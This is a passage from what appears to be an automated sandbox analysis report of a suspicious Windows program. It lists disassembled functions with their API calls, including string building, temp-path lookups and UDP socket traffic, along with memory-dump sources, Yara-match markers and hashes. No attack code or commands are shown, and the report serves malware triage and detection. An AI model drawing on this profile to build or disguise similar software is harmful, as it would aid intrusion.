                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0242DABE
                                    • lstrcat.KERNEL32(00000000,024A5708), ref: 0242DB20
                                    • lstrcat.KERNEL32(00000000,024A570C), ref: 0242DB32
                                    • lstrcat.KERNEL32(00000000,024A5710), ref: 0242DB5B
                                    • lstrlen.KERNEL32(00000000,%s,0242E3E7,?,?,?,?,?,?), ref: 0242DB71
                                    • wsprintfA.USER32 ref: 0242DB7F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0242DB93
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
                                    • String ID: %s
                                    • API String ID: 3923932729-3043279178
                                    • Opcode ID: c01ebf1bd99c5d054a37d117fef2e99d26a2192628c5e0805e964029a6c66ae0
                                    • Instruction ID: c74c0a7083a25789a06e9fc3daccc7c4452464d1b90b674c7bf2ea54f6e2217a
                                    • Opcode Fuzzy Hash: c01ebf1bd99c5d054a37d117fef2e99d26a2192628c5e0805e964029a6c66ae0
                                    • Instruction Fuzzy Hash: 4931EBB5D40228DBEB28DFA5CD85BED7776AF4C300F9044B9E109D6180D7759658CF50
                                    Function 02425B02 Relevance: 12.1, APIs: 8, Instructions: 74stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • GetTickCount.KERNEL32 ref: 02425B71
                                    • lstrlen.KERNEL32(0242B8F8,024A400C,00000000,?,?,?,?,0242B8F8,00000000), ref: 02425B83
                                    • wsprintfA.USER32 ref: 02425B8F
                                    • GetTickCount.KERNEL32 ref: 02425B50
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • GetTickCount.KERNEL32 ref: 02425B9A
                                    • GetTickCount.KERNEL32 ref: 02425BBB
                                    • lstrlen.KERNEL32(0242B8F8,024A4004,00000000,?,?,?,?,0242B8F8,00000000), ref: 02425BCD
                                    • wsprintfA.USER32 ref: 02425BD9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick$lstrlentolowerwsprintf$ExchangeInterlocked
                                    • String ID:
                                    • API String ID: 400381017-0
                                    • Opcode ID: 37807a791180407f0f82e94b4a8695811e263d29d065a3bbe8cdf1561880b484
                                    • Instruction ID: 20b194b32cc47769d6bc9b0556a1e2f5c7fee7bfd6faf523cbc6cee14adead28
                                    • Opcode Fuzzy Hash: 37807a791180407f0f82e94b4a8695811e263d29d065a3bbe8cdf1561880b484
                                    • Instruction Fuzzy Hash: 6821A876E401106BD71C9BA6DC49FAA3F9DEF48381F444929F90DCB340DA35E924CBA1
                                    Function 02425BE5 Relevance: 12.1, APIs: 8, Instructions: 72stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathA.KERNEL32(00000080,00000000,?), ref: 02425C17
                                    • lstrlen.KERNEL32(00000000), ref: 02425C21
                                    • lstrcat.KERNEL32(00000000,024A55F4), ref: 02425C3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02425C5A
                                    • lstrlen.KERNEL32(00000000,024A41D4,00000000), ref: 02425C88
                                    • wsprintfA.USER32 ref: 02425C94
                                    • lstrlen.KERNEL32(00000000,024A41E0,00000000), ref: 02425CB1
                                    • wsprintfA.USER32 ref: 02425CBD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                    • String ID:
                                    • API String ID: 2776683041-0
                                    • Opcode ID: f540022a22d4e9a06e588c758f98fad392273cb7f14b671e6359ea9f4576fbd1
                                    • Instruction ID: 8549f5b80e5ca9936e0657416002086a4965d228616bf157b5f57f7fc28deb92
                                    • Opcode Fuzzy Hash: f540022a22d4e9a06e588c758f98fad392273cb7f14b671e6359ea9f4576fbd1
                                    • Instruction Fuzzy Hash: F421DAB5A40114AFD708DF68D988FEA7B79AF98304F408559FA0D87340DA75DA94CF90
                                    Function 0041DB60 Relevance: 12.1, APIs: 8, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0041DB7C
                                    • PtInRect.USER32(?,?,?), ref: 0041DB91
                                    • ReleaseCapture.USER32 ref: 0041DBA1
                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0041DBAF
                                    • GetCapture.USER32 ref: 0041DBBF
                                    • SetCapture.USER32(?), ref: 0041DBCA
                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0041DBEB
                                    • SetCapture.USER32(?), ref: 0041DBF5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CaptureRect$Invalidate$ClientRelease
                                    • String ID:
                                    • API String ID: 3559558096-0
                                    • Opcode ID: 6b2d81427ffc2f60955a4c16d43ae5d42a8e60f37a6df78774fc584419ee544d
                                    • Instruction ID: 845660daffce57ea6d5cdf62980bd52e62d197c013a0f93652b02f8d53a6549d
                                    • Opcode Fuzzy Hash: 6b2d81427ffc2f60955a4c16d43ae5d42a8e60f37a6df78774fc584419ee544d
                                    • Instruction Fuzzy Hash: C2112A75900710AFD764EB68DC48FABB7A8BF54705F40892EF686C6250EB35F804CB68
                                    Function 00411DF0 Relevance: 10.8, APIs: 7, Instructions: 319COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00411E4A
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 00411E5B
                                    • VariantClear.OLEAUT32(?), ref: 004121FB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCopyInit
                                    • String ID:
                                    • API String ID: 1785138364-0
                                    • Opcode ID: e2e5e395a29593ccdb420bef05903e56570fe5719726a131e08e012fa538a7fb
                                    • Instruction ID: 758d0668a85cbd1e27090c2d9ad8d85be2bc746f19a3d41977ad39db9655a3cc
                                    • Opcode Fuzzy Hash: e2e5e395a29593ccdb420bef05903e56570fe5719726a131e08e012fa538a7fb
                                    • Instruction Fuzzy Hash: 9EC17D756082529FD314CF68C680AABB7F4BB89700F14482EEA91C7360D379DC96DB5B
                                    Function 00426BE0 Relevance: 10.8, APIs: 7, Instructions: 268windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(?), ref: 00426C1D
                                    • GetParent.USER32(?), ref: 00426C2F
                                    • SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00426C57
                                    • GetWindowRect.USER32(?,?), ref: 00426CE1
                                    • InvalidateRect.USER32(?,?,00000001,?), ref: 00426D04
                                    • GetWindowRect.USER32(?,?), ref: 00426ECC
                                    • InvalidateRect.USER32(?,?,00000001,?), ref: 00426EED
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$Invalidate$MessageParentSend
                                    • String ID:
                                    • API String ID: 236041146-0
                                    • Opcode ID: f2be2b3cb2c673cf38bb76c50c68f222823f65f888cc6050d959affe30661979
                                    • Instruction ID: f05277a49bb36b9f0e7a4b2654acbcc00c52182db2504a352a4b761dfc2ba362
                                    • Opcode Fuzzy Hash: f2be2b3cb2c673cf38bb76c50c68f222823f65f888cc6050d959affe30661979
                                    • Instruction Fuzzy Hash: 4D91E1317003159BD764EF25EC40B6B73E4AF84748F560A2EF9459B282EB38ED058B99
                                    Function 00438130 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 265windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetObjectA.GDI32(?,00000018,?), ref: 0043816D
                                    • MulDiv.KERNEL32(?,?,00000064), ref: 004381A2
                                    • MulDiv.KERNEL32(?,?,00000064), ref: 004381CD
                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0043837B
                                    • GlobalFree.KERNEL32(00000000), ref: 00438443
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: FreeGlobalObjectStretch
                                    • String ID: pTL
                                    • API String ID: 3670910119-168633513
                                    • Opcode ID: 2ceb1cfed3efd696ec4a7b34c9b52a26c9caa96cbf92294532a2b3498ea7660c
                                    • Instruction ID: 724965e028ca5e3a9c44f8e84bbc6e75a0332943d9eed8d5142fe3f87e28fff8
                                    • Opcode Fuzzy Hash: 2ceb1cfed3efd696ec4a7b34c9b52a26c9caa96cbf92294532a2b3498ea7660c
                                    • Instruction Fuzzy Hash: 1591E1751083449FC710EF65CD81F6BB7E8EB98704F144A2EF69183281DBB8E909CB5A
                                    Function 00411010 Relevance: 10.7, APIs: 7, Instructions: 201windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 004111A4
                                    • TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00411203
                                    • DestroyMenu.USER32(00000000), ref: 0041120A
                                    • SetForegroundWindow.USER32(?), ref: 00411220
                                    • TrackPopupMenu.USER32(00000000,00000008,?,?,00000000,?,00000000), ref: 00411241
                                    • PostMessageA.USER32(?,00000000,00000000,00000000), ref: 00411251
                                    • DestroyMenu.USER32(00000000), ref: 00411258
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$DestroyPopupTrack$CursorForegroundMessagePostWindow
                                    • String ID:
                                    • API String ID: 1044074573-0
                                    • Opcode ID: 8e6ca9d604f1d22b7f80a5c036c9eb6f06f33606f68b240c74a0c5f699d2d609
                                    • Instruction ID: abe6accadc9790e1260eb7b9b4dc92fc5f2cc9135035eb38bb32f51e9aa3c61d
                                    • Opcode Fuzzy Hash: 8e6ca9d604f1d22b7f80a5c036c9eb6f06f33606f68b240c74a0c5f699d2d609
                                    • Instruction Fuzzy Hash: AE61B071604311ABC314DF55DC81FABB3E8FF88308F454A5DFA45A7292D738E9058BAA
                                    Function 00439550 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00439639
                                    • OffsetRect.USER32(?,?,?), ref: 00439646
                                    • IntersectRect.USER32(?,?,?), ref: 00439662
                                    • IsRectEmpty.USER32(?), ref: 0043966D
                                    • OffsetRect.USER32(?,?,?), ref: 004396AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Offset$EmptyIntersect
                                    • String ID: 2
                                    • API String ID: 765610062-450215437
                                    • Opcode ID: 5519f3908d56714601442429ce822fd3928960b76e326834e510c81407ef06de
                                    • Instruction ID: 095237607498ef6161b24400b82b06015235aa3fe0f7356ec96bb117e5e676c2
                                    • Opcode Fuzzy Hash: 5519f3908d56714601442429ce822fd3928960b76e326834e510c81407ef06de
                                    • Instruction Fuzzy Hash: A76111B56083419FD328CF29C88496BBBE9BBC8344F149A2EF58987360D774E905CF56
                                    Function 00424160 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ClientCreateEmptyFill
                                    • String ID: pTL
                                    • API String ID: 97219908-168633513
                                    • Opcode ID: 6135f3a19b95b5175cfa386f2b5285d494609a1d302e3c36b87f1c45aa220766
                                    • Instruction ID: 58a106870cc4c2164096725554725f21b801919612d326af25f06482f5f4f43e
                                    • Opcode Fuzzy Hash: 6135f3a19b95b5175cfa386f2b5285d494609a1d302e3c36b87f1c45aa220766
                                    • Instruction Fuzzy Hash: CF515AB5204202AFD704DF66D884F6BB3E8FF88704F44891EB95683240DB78E905CBA6
                                    Function 02422CFA Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 02422D58
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02422DB6
                                    • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 02422E8E
                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02422EBD
                                    • closesocket.WS2_32(?), ref: 02422F8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketrecvfromselectsendtosocket
                                    • String ID: @
                                    • API String ID: 4198204009-2766056989
                                    • Opcode ID: 35fd4f826a3d55576f3e1cb989548a4908a4ca77846155179186993d92332f7f
                                    • Instruction ID: 93a2187a3614b8853da0e1107de64a667c25c0ab97fbb390f21fdf8d3ab5953e
                                    • Opcode Fuzzy Hash: 35fd4f826a3d55576f3e1cb989548a4908a4ca77846155179186993d92332f7f
                                    • Instruction Fuzzy Hash: 6E619F71D042699BDB38CB15CC54BEAB775AF08340F9041DAE79EA6280D7F45AC9DF40
                                    Function 024232DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141networkCOMMON
                                    Download Yara Rule
                                    APIs
